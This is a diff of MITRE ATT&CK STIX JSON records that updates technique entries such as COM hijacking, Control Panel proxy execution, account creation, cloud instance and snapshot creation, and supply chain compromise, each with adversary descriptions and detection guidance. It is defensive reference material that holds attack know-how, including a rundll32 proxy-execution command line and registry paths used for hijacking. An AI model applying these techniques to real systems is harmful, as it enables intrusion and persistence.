+ "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)",
"name": "Component Object Model",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -4469,18 +4577,21 @@
],
"modified": "2020-03-28T19:30:52.639Z",
"created": "2020-02-12T14:09:53.107Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ",
"x_mitre_data_sources": [
"Process monitoring",
"DLL monitoring"
- ],
- "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Windows"
]
},
{
+ "created": "2017-05-31T21:31:33.979Z",
+ "modified": "2020-03-20T16:01:20.868Z",
+ "type": "attack-pattern",
"revoked": true,
"id": "attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69",
"name": "Component Object Model Hijacking",
@@ -4505,10 +4616,7 @@
"description": "Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.",
"url": "https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com"
}
- ],
- "type": "attack-pattern",
- "modified": "2020-03-20T16:01:20.868Z",
- "created": "2017-05-31T21:31:33.979Z"
+ ]
},
{
"external_references": [
@@ -4551,14 +4659,14 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-16T14:19:22.457Z",
+ "modified": "2020-07-09T13:55:51.172Z",
"created": "2020-03-16T14:12:47.923Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "ENDGAME"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Endgame COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
@@ -4566,12 +4674,12 @@
"DLL monitoring",
"Windows Registry"
],
- "x_mitre_detection": "There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Endgame COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated. \n\nLikewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Elastic"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"revoked": false,
@@ -4657,17 +4765,8 @@
],
"modified": "2020-03-30T13:36:10.069Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_remote_support": true,
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "User"
- ],
- "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "2.0",
"x_mitre_data_sources": [
"PowerShell logs",
"API monitoring",
@@ -4678,8 +4777,17 @@
"Windows Registry",
"Windows event logs"
],
- "x_mitre_version": "2.0",
- "x_mitre_deprecated": true
+ "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5",
@@ -4705,21 +4813,21 @@
],
"modified": "2020-03-27T14:49:58.249Z",
"created": "2020-02-11T18:18:34.279Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "CrowdStrike Falcon OverWatch"
+ ],
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Binary file metadata"
+ ],
+ "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.",
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Binary file metadata"
- ],
- "x_mitre_contributors": [
- "CrowdStrike Falcon OverWatch"
- ]
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -4745,20 +4853,20 @@
],
"modified": "2020-03-23T12:51:45.475Z",
"created": "2020-03-11T14:28:40.064Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.",
"x_mitre_data_sources": [
"Component firmware",
"BIOS",
"Disk forensics",
"EFI"
],
- "x_mitre_detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -4789,20 +4897,36 @@
],
"modified": "2020-03-11T14:13:42.916Z",
"created": "2020-03-11T14:13:42.916Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
"x_mitre_data_sources": [
"File monitoring",
"Web proxy"
],
- "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-03-11T14:17:21.153Z",
+ "modified": "2020-03-11T14:17:21.153Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "initial-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
+ "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) ",
+ "name": "Compromise Software Supply Chain",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -4820,22 +4944,6 @@
"source_name": "Command Five SK 2011"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Compromise Software Supply Chain",
- "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) ",
- "id": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "initial-access"
- }
- ],
- "modified": "2020-03-11T14:17:21.153Z",
- "created": "2020-03-11T14:17:21.153Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -4878,23 +4986,23 @@
],
"modified": "2020-03-24T16:42:09.222Z",
"created": "2020-02-14T13:09:51.004Z",
- "x_mitre_platforms": [
- "SaaS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
"x_mitre_data_sources": [
"Third-party application logs",
"Authentication logs"
],
- "x_mitre_detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "SaaS"
+ ]
},
{
"id": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f",
- "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)\n\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.",
+ "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)\n\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.",
"name": "Control Panel",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -4934,20 +5042,11 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T16:11:43.517Z",
+ "modified": "2020-06-20T22:33:18.929Z",
"created": "2020-01-23T19:59:52.630Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Application whitelisting"
- ],
- "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). (Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
@@ -4956,9 +5055,17 @@
"Binary file metadata",
"API monitoring"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). (Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)",
+ "x_mitre_defense_bypassed": [
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -5024,9 +5131,22 @@
],
"modified": "2020-03-24T12:44:28.199Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Microsoft Threat Intelligence Center (MSTIC)",
+ "Praetorian"
],
+ "x_mitre_version": "2.1",
+ "x_mitre_data_sources": [
+ "Office 365 account logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs",
+ "Process monitoring",
+ "Process command-line parameters",
+ "Authentication logs",
+ "Windows event logs"
+ ],
+ "x_mitre_detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -5037,22 +5157,71 @@
"Azure",
"Office 365"
],
- "x_mitre_detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ]
+ },
+ {
+ "id": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
+ "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.",
+ "name": "Create Cloud Instance",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578.002",
+ "url": "https://attack.mitre.org/techniques/T1578/002"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ },
+ {
+ "source_name": "AWS CloudTrail Search",
+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/",
+ "description": "Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Azure Activity Logs",
+ "url": "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs",
+ "description": "Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Cloud Audit Logs",
+ "url": "https://cloud.google.com/logging/docs/audit#admin-activity",
+ "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020."
+ }
+ ],
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-18T11:45:36.417Z",
+ "created": "2020-05-14T14:45:15.978Z",
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
+ ],
"x_mitre_data_sources": [
- "Office 365 account logs",
+ "GCP audit logs",
+ "Stackdriver logs",
"Azure activity logs",
- "AWS CloudTrail logs",
- "Process monitoring",
- "Process command-line parameters",
- "Authentication logs",
- "Windows event logs"
+ "AWS CloudTrail logs"
],
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Microsoft Threat Intelligence Center (MSTIC)",
- "Praetorian"
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)"
},
{
"external_references": [
@@ -5087,25 +5256,115 @@
],
"modified": "2020-03-26T21:28:19.476Z",
"created": "2020-02-18T16:48:56.582Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "Windows User Account Control",
+ "System access controls",
+ "File system access controls"
],
+ "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Access tokens",
"API monitoring"
],
- "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
- "x_mitre_defense_bypassed": [
- "Windows User Account Control",
- "System access controls",
- "File system access controls"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1578.001",
+ "url": "https://attack.mitre.org/techniques/T1578/001"
+ },
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ },
+ {
+ "source_name": "AWS Cloud Trail Backup API",
+ "url": "https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html",
+ "description": "Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail. Retrieved April 27, 2020."
+ },
+ {
+ "source_name": "Azure - Monitor Logs",
+ "url": "https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor",
+ "description": "Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor. Retrieved May 1, 2020."
+ },
+ {
+ "source_name": "Cloud Audit Logs",
+ "url": "https://cloud.google.com/logging/docs/audit#admin-activity",
+ "description": "Google. (n.d.). Audit Logs. Retrieved June 1, 2020."
+ },
+ {
+ "source_name": "GCP - Creating and Starting a VM",
+ "url": "https://cloud.google.com/compute/docs/instances/create-start-instance#api_2",
+ "description": "Google. (2020, April 23). Creating and Starting a VM instance. Retrieved May 1, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Create Snapshot",
